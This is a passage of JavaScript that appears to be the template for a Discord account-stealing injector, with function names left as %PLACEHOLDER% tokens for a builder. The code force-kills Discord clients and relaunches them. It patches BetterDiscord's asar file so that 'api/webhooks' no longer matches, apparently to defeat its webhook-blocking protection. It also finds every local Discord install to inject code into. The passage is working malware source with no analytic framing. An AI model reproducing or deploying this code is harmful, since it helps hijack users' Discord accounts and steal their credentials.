1397 | if (stdout.includes(client)) {
1398 | await exec(`taskkill /F /T /IM ${client}`, (err) => {})
1399 | await exec(`"${LOCAL}\\${client.replace('.exe', '')}\\Update.exe" --processStart ${client}`, (err) => {})
1400 | }
1401 | }
1402 | })
1403 | };
1404 | function %BETTERBROKE%() {
1405 | let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
1406 | if (fs.existsSync(dir)) {
1407 | let x = fs.readFileSync(dir)
1408 | fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "vareontop"))
1409 | }
1410 | return;
1411 | }
1412 |
1413 | async function %DISCORDINJ%() {
1414 | fs.readdirSync(LOCAL).forEach(file => {
1415 | if (file.includes("iscord")) {
1416 | discords.push(LOCAL + '\\' + file)
1417 | } else {
1418 | return;
1419 | }
1420 | });
1421 | for (const paths of discords) {
1422 | %FINDINDEX%(paths)
1423 | }
1424 | for (const paths of discords) {
1425 | await %FINDINJ%(paths)
1426 | }
1427 | await %INJECTT%();
1428 | await %BETTERBROKE%();
1429 | if (killdcop)
1430 | await %KILLDC%();
1431 | }
1432 |
1433 | async function %VARECHECKSTART%() {
1434 | await %VARESLEEP%(1000)
1435 | axios.get('https://yandex.com').then((res) => {%STARTVARE%()}).catch((err) => {%VARESTARTUP%()});
1436 | }
1437 |
1438 |
1439 | %VARECHECKSTART%()
1440 |
1441 |
1442 | process.on("uncaughtException", err => console.error(err)).on("unhandledRejection", err => console.error(err));
--------------------------------------------------------------------------------